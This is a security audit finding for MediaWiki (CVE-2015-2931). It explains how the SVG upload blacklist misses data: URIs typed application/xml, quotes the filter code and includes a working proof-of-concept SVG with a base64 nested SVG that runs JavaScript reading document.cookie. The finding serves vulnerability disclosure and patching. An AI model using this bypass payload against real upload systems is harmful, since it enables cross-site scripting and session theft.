FINDING ID: iSEC-WMF1214-11
DESCRIPTION: When uploading an SVG file, it is possible to bypass the validation filters and upload an
SVG file that executes JavaScript when rendered. The SVG validation is a blacklist-based approach and
contains protections against numerous techniques for embedding JavaScript in SVG files; however, the
protections against nested SVG files are inadequate due to a missing MIME type blacklist. Specifically,
data: URIs with the image/svg or text/xml formats are blacklisted, but the application/xml MIME
type is sufficient to create a nested SVG file with JavaScript code.
# /includes/upload/UploadBase.php # href with embedded svg as target if ($stripped == 'href' && preg_match( '!data:[^,]*image/svg[^,]*,!sim', $value)){ wfDebug( __METHOD__ . ": Found href to embedded svg " . "\"<$strippedElement '$attrib'='$value '...\" in uploaded file.\n" ); return true;} # href with embedded (text/xml) svg as target if ( $stripped == 'href' && preg_match( '!data:[^,]*text/xml[^,]*,!sim', $value)){ wfDebug( __METHOD__ . ": Found href to embedded svg " . "\"<$strippedElement '$attrib'='$value '...\" in uploaded file.\n" ); return true;}
Listing 1: Blacklist filtering for data: URIs with specific MIME types.
The following example SVG file contains a nested SVG file embedded within a data: URI. The nested
SVG file contains executable JavaScript.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <use xlink:href="data:application/xml;base64 , PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5r PSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj4KPGRlZnM+CjxjaXJjbGUgaWQ9InRlc3QiIHI9I jUwIiBjeD0iMTAwIiBjeT0iMTAwIiBzdHlsZT0iZmlsbDogI0YwMCI+CjxzZXQgYXR0cmlidXRlTm FtZT0iZmlsbCIgYXR0cmlidXRlVHlwZT0iQ1NTIiBvbmJlZ2luPSdhbGVydChkb2N1bWVudC5jb29r aWUpJwpvbmVuZD0nYWxlcnQoIm9uZW5kIiknIHRvPSIjMDBGIiBiZWdpbj0iMXMiIGR1cj0iNXMiIC 8+CjwvY2lyY2xlPgo8L2RlZnM+Cjx1c2UgeGxpbms6aHJlZj0iI3Rlc3QiLz4KPC9zdmc+#test"/> </svg>
Listing 2: Specially-crafted SVG file with a nested SVG file containing executable JavaScript code.
During testing, this exploit was only confirmed against the Firefox browser. Testing indicates that other
browsers do not support nested SVG files
Patch:
(based on top of patch for T85349, )- 1.24:
- 1.23:
- 1.19:
Affected Versions: (needed)
Type: xss
CVE: CVE-2015-2931